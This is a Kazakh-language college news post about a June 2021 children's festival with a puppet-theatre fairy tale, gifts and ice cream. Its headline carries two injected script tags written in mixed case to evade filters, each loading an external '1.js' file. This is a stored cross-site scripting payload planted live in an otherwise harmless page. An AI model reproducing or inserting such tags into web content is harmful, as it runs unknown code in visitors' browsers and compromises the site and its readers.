Шаттық сыйлаған мереке<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
02.06.2021
Ағымдағы жылдың 1 маусымында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде тәрбие бөлімі және «Сиқырлы әлем» қуыршақ театрының жетекшісі Г.Т Балдыкованың ұйымдастыруымен колледж оқытушылары мен қызметкерлері бүлдіршіндеріне «Мен өмірдің гүлімен!» атты ертеңгілік өткізілді. Іс-шара барысында балалар табиғатты аялау туралы ертегі тамашалап, кейіпкерлердің қызықты тапсырмаларын орындады. Ертеңгілік соңында балаларға сыйлықтар мен балмұздақ үлестірілді. Ұйымдастырылған шара бүлдіршіндер мен ата-аналардың көңілінен шықты әрі есте қалған ерекше күн болды.
Просмотров: 444